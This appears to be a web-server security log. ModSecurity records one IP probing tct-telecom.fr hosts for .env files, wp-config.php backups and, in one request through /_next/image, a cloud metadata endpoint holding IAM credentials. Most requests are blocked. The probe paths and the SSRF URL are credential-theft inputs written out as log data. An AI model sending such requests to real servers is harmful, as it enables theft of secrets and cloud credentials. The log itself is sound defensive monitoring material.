[Mon May 11 15:23:11.567425 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuCBwAAAUE"]
[Mon May 11 15:23:11.567536 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuCBwAAAUE"]
[Mon May 11 15:23:11.567701 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuCBwAAAUE"]
[Mon May 11 15:23:11.574687 2026] [proxy_fcgi:error] [pid 1320398:tid 1320412] [client 195.178.110.133:2712] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.580634 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxgAAAMk"]
[Mon May 11 15:23:11.580748 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxgAAAMk"]
[Mon May 11 15:23:11.580923 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxgAAAMk"]
[Mon May 11 15:23:11.594339 2026] [proxy_fcgi:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.597479 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxwAAAMk"]
[Mon May 11 15:23:11.597593 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxwAAAMk"]
[Mon May 11 15:23:11.597778 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SxwAAAMk"]
[Mon May 11 15:23:11.614386 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyAAAAMk"]
[Mon May 11 15:23:11.614500 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyAAAAMk"]
[Mon May 11 15:23:11.614670 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyAAAAMk"]
[Mon May 11 15:23:11.611701 2026] [proxy_fcgi:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.631378 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyQAAAMk"]
[Mon May 11 15:23:11.631492 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyQAAAMk"]
[Mon May 11 15:23:11.631664 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP6O9RdIr1DwxYR2SyQAAAMk"]
[Mon May 11 15:23:11.634679 2026] [proxy_fcgi:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.654705 2026] [proxy_fcgi:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.674613 2026] [proxy_fcgi:error] [pid 1320674:tid 1320690] [client 195.178.110.133:2828] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.693604 2026] [proxy_fcgi:error] [pid 1320674:tid 1320690] [client 195.178.110.133:2828] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.712051 2026] [proxy_fcgi:error] [pid 1320674:tid 1320690] [client 195.178.110.133:2828] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:13.163900 2026] [security2:error] [pid 1319886:tid 1319897] [client 195.178.110.133:2992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYQay-5-wpj6Sx56aYvwAAAAA"]
[Mon May 11 15:23:13.164074 2026] [security2:error] [pid 1319886:tid 1319897] [client 195.178.110.133:2992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYQay-5-wpj6Sx56aYvwAAAAA"]
[Mon May 11 15:23:13.164588 2026] [security2:error] [pid 1319885:tid 1319915] [client 195.178.110.133:2980] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYQVchVQ3tCn0m9OpZMgAAAQ8"]
[Mon May 11 15:23:13.164591 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:2884] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYQeJEyNRN152ArOSM4wAAAFM"]
[Mon May 11 15:23:13.164716 2026] [security2:error] [pid 1319885:tid 1319915] [client 195.178.110.133:2980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYQVchVQ3tCn0m9OpZMgAAAQ8"]
[Mon May 11 15:23:13.164220 2026] [security2:error] [pid 1320398:tid 1320411] [client 195.178.110.133:2928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYQeJEyNRN152ArOSM5QAAAEs"]
[Mon May 11 15:23:13.165324 2026] [security2:error] [pid 1320398:tid 1320411] [client 195.178.110.133:2928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYQeJEyNRN152ArOSM5QAAAEs"]
[Mon May 11 15:23:13.165393 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:2884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYQeJEyNRN152ArOSM4wAAAFM"]
[Mon May 11 15:23:13.165482 2026] [security2:error] [pid 1320674:tid 1320700] [client 195.178.110.133:2900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYQaO9RdIr1DwxYR2SzwAAAMo"]
[Mon May 11 15:23:13.165833 2026] [security2:error] [pid 1320674:tid 1320700] [client 195.178.110.133:2900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYQaO9RdIr1DwxYR2SzwAAAMo"]
[Mon May 11 15:23:15.039564 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYQ-SQ-m-m0ukSShuCDgAAAVg"]
[Mon May 11 15:23:15.039725 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYQ-SQ-m-m0ukSShuCDgAAAVg"]
[Mon May 11 15:23:15.039989 2026] [security2:error] [pid 1320398:tid 1320410] [client 195.178.110.133:2936] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYQ-JEyNRN152ArOSM5gAAAEo"]
[Mon May 11 15:23:15.040165 2026] [security2:error] [pid 1320398:tid 1320410] [client 195.178.110.133:2936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYQ-JEyNRN152ArOSM5gAAAEo"]
[Mon May 11 15:23:15.819371 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:2864] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYQ6O9RdIr1DwxYR2S0wAAAMg"]
[Mon May 11 15:23:15.819568 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:2864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYQ6O9RdIr1DwxYR2S0wAAAMg"]
[Mon May 11 15:23:15.963290 2026] [security2:error] [pid 1319885:tid 1319938] [client 195.178.110.133:2948] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYQ1chVQ3tCn0m9OpZNgAAARg"]
[Mon May 11 15:23:15.963662 2026] [security2:error] [pid 1319885:tid 1319938] [client 195.178.110.133:2948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYQ1chVQ3tCn0m9OpZNgAAARg"]
[Mon May 11 15:23:15.981152 2026] [security2:error] [pid 1319886:tid 1319897] [client 195.178.110.133:2992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQay-5-wpj6Sx56aYvwAAAAA"]
[Mon May 11 15:23:16.063710 2026] [access_compat:error] [pid 1319998:tid 1320023] [client 195.178.110.133:2886] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-config.php
[Mon May 11 15:23:16.123225 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:3040] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZNwAAARY"]
[Mon May 11 15:23:16.123422 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:3040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZNwAAARY"]
